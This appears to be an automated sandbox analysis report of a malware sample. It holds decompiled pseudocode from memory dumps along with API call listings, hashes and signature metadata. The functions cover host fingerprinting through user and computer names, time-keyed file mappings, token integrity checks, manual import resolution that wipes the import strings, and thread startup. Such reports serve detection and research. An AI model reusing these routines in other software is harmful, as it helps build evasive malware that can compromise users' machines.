						 *0xdcd228 =  *0xdcd228 ^ 0xe8fa7dd7;
						 *0xdcd278 = _t38;
						_t39 = E00DC75C4(0x60);
						__eflags = _t39;
						 *0xdcd2dc = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xdcd2dc; // 0x5119630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xdcd2dc; // 0x5119630
							 *_t56 = 0xdce882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xdcd1f0, _t84, 0x52);
							__eflags = _t42;
							 *0xdcd270 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xdcd214; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xdcd230; // 0x434a5a8
								_t19 = _t76 + 0xdce212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xdcc2bf);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00DCA12A( ~_v8 &  *0xdcd228, 0xdcd00c); // executed
								_t84 = E00DC58CA(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00DC7098(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00DC37CA(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00DC8BA5(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xdcd130();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00DC3267(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00dc77eb
0x00dc77f6
0x00dc77f9
0x00dc77fc
0x00dc77ff
0x00dc7806
0x00dc7808
0x00dc7814
0x00dc7816
0x00dc7816
0x00dc781f
0x00dc7827
0x00dc782a
0x00dc7844
0x00dc7849
0x00dc784a
0x00dc784c
0x00dc7851
0x00dc7856
0x00dc7858
0x00dc785f
0x00dc7869
0x00dc786f
0x00dc787c
0x00dc7883
0x00dc7888
0x00dc7888
0x00dc7891
0x00dc78ba
0x00dc78bd
0x00dc78ca
0x00dc78d1
0x00dc78dd
0x00dc78df
0x00dc78e1
0x00dc78e6
0x00dc78ec
0x00dc78f2
0x00dc78f8
0x00dc78fb
0x00dc7900
0x00dc7908
0x00dc790a
0x00dc790a
0x00dc790d
0x00dc790d
0x00dc7913
0x00dc7918
0x00dc7920
0x00dc7925
0x00dc792a
0x00dc792c
0x00dc7931
0x00dc7960
0x00dc7933
0x00dc7938
0x00dc793d
0x00dc7942
0x00dc7949
0x00dc794f
0x00dc7954
0x00dc795a
0x00dc795a
0x00dc7961
0x00dc7963
0x00dc7972
0x00dc7978
0x00dc797a
0x00dc797f
0x00dc79ab
0x00dc7981
0x00dc7981
0x00dc7987
0x00dc7994
0x00dc799a
0x00dc799a
0x00dc79a2
0x00dc79a4
0x00dc79ac
0x00dc79ae
0x00dc79b5
0x00dc79c2
0x00dc79cc
0x00dc79ce
0x00dc79d0
0x00000000
0x00000000
0x00dc79d2
0x00dc79d7
0x00dc79d9
0x00dc79e0
0x00dc79e4
0x00dc79e7
0x00dc79fc
0x00dc7a00
0x00dc7a05
0x00000000
0x00dc7a05
0x00dc79e9
0x00dc79eb
0x00000000
0x00000000
0x00dc79ed
0x00dc79f6
0x00dc79f8
0x00dc79fa
0x00000000
0x00000000
0x00000000
0x00dc79fa
0x00dc79dd
0x00dc79dd
0x00dc79ae
0x00dc7893
0x00dc7893
0x00dc7898
0x00dc7a07
0x00dc7a0b
0x00dc7a13
0x00dc7a13
0x00000000
0x00dc7a0b
0x00dc789e
0x00dc78a1
0x00dc78a1
0x00dc78a3
0x00dc78a6
0x00dc78ae
0x00dc78b5
0x00000000
0x00dc7a1b
0x00dc7a1b
0x00dc7a1e
0x00dc7a23
0x00dc7a23

APIs

Part of subcall function 00DC8B76: GetModuleHandleA.KERNEL32(4C44544E,00000000,00DC7804,00000000,00000000,00000000,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC8B85

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,hT,00000000), ref: 00DC786F
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC7888
wsprintfA.USER32 ref: 00DC7908
memset.NTDLL ref: 00DC7938
RtlInitializeCriticalSection.NTDLL(051195F0), ref: 00DC7949
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00DC7972
wsprintfA.USER32 ref: 00DC79A2

Part of subcall function 00DCA12A: GetUserNameW.ADVAPI32(00000000,00DC79C7), ref: 00DCA161
Part of subcall function 00DCA12A: RtlAllocateHeap.NTDLL(00000000,00DC79C7), ref: 00DCA178
Part of subcall function 00DCA12A: GetUserNameW.ADVAPI32(00000000,00DC79C7), ref: 00DCA185
Part of subcall function 00DCA12A: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DC79C7,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DCA1A6
Part of subcall function 00DCA12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DCA1CD
Part of subcall function 00DCA12A: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DCA1E1
Part of subcall function 00DCA12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DCA1EE
Part of subcall function 00DCA12A: HeapFree.KERNEL32(00000000,00000000), ref: 00DCA20C

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

Strings

hT, xrefs: 00DC7851

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID: hT
API String ID: 2910951584-303261386
Opcode ID: 37b4a479b9f80f9343fde471e90bfab747301cc8fbc20d7c337a05286e0e6cfd
Instruction ID: 6d6ec3b793561ed88dca38fa0d6c8c6fc949e1e104eb57ea9a76de6201b892ba
Opcode Fuzzy Hash: 37b4a479b9f80f9343fde471e90bfab747301cc8fbc20d7c337a05286e0e6cfd
Instruction Fuzzy Hash: 3F51B171944217ABDB21DBA8DC45FAEB7A9EB04710F18052DE909E7290DB70DE019FB4

Uniqueness

Uniqueness Score: -1.00%

Function 70251470, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E70251470(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L70252150();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x70254150;
				_push(_t15 + 0x7025505e);
				_push(_t15 + 0x70255054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L7025214A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x70254140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x70251470
0x70251479
0x7025147d
0x70251483
0x70251488
0x7025148d
0x70251490
0x70251493
0x70251498
0x70251499
0x7025149c
0x702514a7
0x702514ae
0x702514b2
0x702514b4
0x702514b5
0x702514b8
0x702514bd
0x702514c7
0x702514c9
0x702514c9
0x702514dd
0x702514e3
0x702514e7
0x70251537
0x702514e9
0x702514f2
0x70251508
0x70251510
0x70251522
0x70251526
0x00000000
0x00000000
0x70251512
0x70251515
0x7025151a
0x7025151c
0x7025151c
0x702514fd
0x702514ff
0x70251528
0x70251529
0x70251529
0x702514f2
0x7025153f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A,?), ref: 7025147D
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 70251493
_snwprintf.NTDLL ref: 702514B8
CreateFileMappingW.KERNELBASE(000000FF,70254140,00000004,00000000,?,?), ref: 702514DD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A), ref: 702514F4
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 70251508
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A), ref: 70251520
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B), ref: 70251529
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A), ref: 70251531

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: d344053177942dad718ae4cbb1fd9972736607c976d3ed695f7d1b00eca069af
Instruction ID: 04fd878db8f01313424fc7af4e73dbaf2701b5b4cf63c83e3332d6c527699377
Opcode Fuzzy Hash: d344053177942dad718ae4cbb1fd9972736607c976d3ed695f7d1b00eca069af
Instruction Fuzzy Hash: 1E2186B3600104BFC7019FA9DC88F9E77BDEB88354F6040A5F617D7290E6709D599B68

Uniqueness

Uniqueness Score: -1.00%

Function 00DC12E8, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00DC12E8(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00DCAEDA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xdcd230; // 0x434a5a8
				_t5 = _t13 + 0xdce84d; // 0x5118df5
				_t6 = _t13 + 0xdce580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00DCABFA();
				_t17 = CreateFileMappingW(0xffffffff, 0xdcd234, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00dc12e8
0x00dc12f0
0x00dc12f4
0x00dc12fa
0x00dc12ff
0x00dc1304
0x00dc1307
0x00dc130a
0x00dc130f
0x00dc1310
0x00dc1313
0x00dc1318
0x00dc131f
0x00dc1329
0x00dc132b
0x00dc132c
0x00dc132f
0x00dc134b
0x00dc1351
0x00dc1355
0x00dc13a3
0x00dc1357
0x00dc1364
0x00dc1374
0x00dc137c
0x00dc138e
0x00dc1392
0x00000000
0x00000000
0x00dc137e
0x00dc1381
0x00dc1386
0x00dc1388
0x00dc1388
0x00dc1366
0x00dc1368
0x00dc1394
0x00dc1395
0x00dc1395
0x00dc1364
0x00dc13aa

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00DC7881,?,00000001,?), ref: 00DC12F4
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00DC130A
_snwprintf.NTDLL ref: 00DC132F
CreateFileMappingW.KERNELBASE(000000FF,00DCD234,00000004,00000000,00001000,?), ref: 00DC134B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DC7881,?), ref: 00DC135D
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00DC1374
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DC7881), ref: 00DC1395
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DC7881,?), ref: 00DC139D

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 21f5bf6881bb4600981fd9801955aaa7edb285192ccc1e35064ab745b38031f0
Instruction ID: 4af33cd7fc364e13c6b8a03bf906b10e1d6b4d25963b2d61af177c5a008805ac
Opcode Fuzzy Hash: 21f5bf6881bb4600981fd9801955aaa7edb285192ccc1e35064ab745b38031f0
Instruction Fuzzy Hash: 37210276A4031AFBD721AB98CC05F9D77B9AF85704F380129F609EB2D1D670D9059B70

Uniqueness

Uniqueness Score: -1.00%

Function 702512D5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E702512D5(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x702512de
0x702512e4
0x702512eb
0x702512ee
0x702513ef
0x702513f4
0x702513f4
0x702512f5
0x702512f8
0x702512fd
0x70251300
0x702513ee
0x00000000
0x702513ee
0x70251307
0x70251307
0x7025130b
0x70251313
0x70251316
0x00000000
0x00000000
0x7025131c
0x7025132b
0x70251330
0x70251332
0x70251335
0x7025133a
0x70251346
0x70251346
0x70251349
0x7025134d
0x702513d3
0x702513d3
0x702513d6
0x702513db
0x702513de
0x00000000
0x00000000
0x702513ed
0x00000000
0x702513ed
0x70251357
0x7025135a
0x00000000
0x7025135c
0x7025135c
0x70251365
0x7025137a
0x7025137c
0x70251373
0x70251373
0x70251373
0x7025135e
0x7025135e
0x7025135e
0x70251381
0x70251381
0x70251384
0x70251386
0x70251386
0x7025138e
0x70251396
0x70251399
0x00000000
0x00000000
0x7025139d
0x7025139f
0x702513ad
0x702513b2
0x702513b2
0x702513bb
0x702513be
0x702513c1
0x702513c5
0x00000000
0x702513c7
0x702513d0
0x702513d0
0x00000000
0x702513d0
0x702513c9
0x702513c9
0x00000000
0x702513c9
0x7025133e
0x70251340
0x00000000
0x00000000
0x00000000
0x70251340
0x702513e6
0x00000000

APIs

LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 7025130B
lstrlenA.KERNEL32(00000002), ref: 70251321
memset.NTDLL ref: 7025132B
GetProcAddress.KERNEL32(?,00000002), ref: 7025138E
lstrlenA.KERNEL32(-00000002), ref: 702513A3
memset.NTDLL ref: 702513AD

Strings

~, xrefs: 702513E6

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 56aab53dc0a8bb29fe5b58dfc8d75b6a164358d4bdf7b534e7f8d2a88b1b161f
Instruction ID: 0041f135e6c80a5016c3e8401463d739dcbcff822bd018f4a717fb6c9baf79f3
Opcode Fuzzy Hash: 56aab53dc0a8bb29fe5b58dfc8d75b6a164358d4bdf7b534e7f8d2a88b1b161f
Instruction Fuzzy Hash: 6D315D73B00216ABDB01CF59C994BAEB7B9AF44244F2040ECE806D7740D774EA29CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00DC9FC0, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DC9FC0(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xdcd214 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00DC75C4(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00DC4C31(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00dc9fcd
0x00dc9fd4
0x00dc9fdb
0x00dc9fef
0x00dc9ffa
0x00dca012
0x00dca01f
0x00dca022
0x00dca027
0x00dca032
0x00dca036
0x00dca045
0x00dca049
0x00dca065
0x00dca065
0x00dca069
0x00dca069
0x00dca06e
0x00dca072
0x00dca078
0x00dca079
0x00dca080
0x00dca086

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00DC9FF2
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00DCA012
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00DCA022
CloseHandle.KERNEL32(00000000), ref: 00DCA072

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00DCA045
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DCA04D
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DCA05D

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 19490131bc989a97abeab67fad83c172a45040d336f37fd8b8fdf5c6ea47ecc8
Instruction ID: 7718e4b829dd64abd16393670204c8e6260f0b3484b1c174e6ba4f881047eb9d
Opcode Fuzzy Hash: 19490131bc989a97abeab67fad83c172a45040d336f37fd8b8fdf5c6ea47ecc8
Instruction Fuzzy Hash: 0D21197590020EBFEB109F94DC85EAEBBB9EB08344F1400A9E910A7261C7718A45EB70

Uniqueness

Uniqueness Score: -1.00%

Function 70251B9E, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x70254108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x7025410c;
						if( *0x7025410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x70254118;
								if( *0x70254118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x7025410c);
						}
						HeapDestroy( *0x70254110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x70254108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x70254110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x70254130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E70251CB2, E70251D4C(_a12, 0, 0x70254118, _t41), 0,  &_a8); // executed
							 *0x7025410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x70251ba1
0x70251bad
0x70251baf
0x70251bb2
0x70251c2c
0x70251c32
0x70251c34
0x70251c36
0x70251c3c
0x70251c3e
0x70251c43
0x70251c46
0x70251c51
0x70251c53
0x00000000
0x00000000
0x70251c55
0x70251c58
0x70251c5a
0x00000000
0x00000000
0x00000000
0x70251c5a
0x70251c62
0x70251c62
0x70251c6e
0x70251c6e
0x70251bb4
0x70251bb5
0x70251bd5
0x70251bdb
0x70251bdd
0x70251be2
0x70251c22
0x70251c22
0x70251be4
0x70251bec
0x70251bf3
0x70251c0c
0x70251c14
0x70251c19
0x70251c1e
0x00000000
0x70251c1e
0x70251c19
0x70251be2
0x70251bb5
0x70251c7b

APIs

InterlockedIncrement.KERNEL32(70254108), ref: 70251BC0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 70251BD5
CreateThread.KERNELBASE ref: 70251C0C
InterlockedDecrement.KERNEL32(70254108), ref: 70251C2C
SleepEx.KERNEL32(00000064,00000001), ref: 70251C46
CloseHandle.KERNEL32 ref: 70251C62
HeapDestroy.KERNEL32 ref: 70251C6E

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: 0f6c6bc5c1be53842627aa0e2e3ac752e1242e3214bf96ea187d80d0dd76ae54
Instruction ID: de361784e467ed7ef39bddc6b5f1ae1421ccdf8bf223feada3704a5bf64efcf3
Opcode Fuzzy Hash: 0f6c6bc5c1be53842627aa0e2e3ac752e1242e3214bf96ea187d80d0dd76ae54
Instruction Fuzzy Hash: 11210733704205AFC7009F6ACC8CB6DBBB8FB5165A73081EAF40AD2250D7B19D549B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00DC8714, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00DC8714(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xdcd1f0 = _t14;
				if(_t14 != 0) {
					 *0xdcd160 = GetTickCount();
					_t16 = E00DC7A5D(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00DCB03E();
						_t40 = _t18 + _t20;
						_t22 = E00DC501B(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xdcd20c; // 0x32c
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xdcd218 = 1; // executed
						}
					}
					_t16 = E00DC77EB(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00dc8714
0x00dc8729
0x00dc8731
0x00dc8736
0x00dc8749
0x00dc874e
0x00dc8755
0x00dc87dd
0x00dc87e3
0x00000000
0x00000000
0x00000000
0x00dc875b
0x00dc875b
0x00dc8760
0x00dc8766
0x00dc876c
0x00dc8776
0x00dc877a
0x00dc877b
0x00dc8780
0x00dc8781
0x00dc8782
0x00dc8787
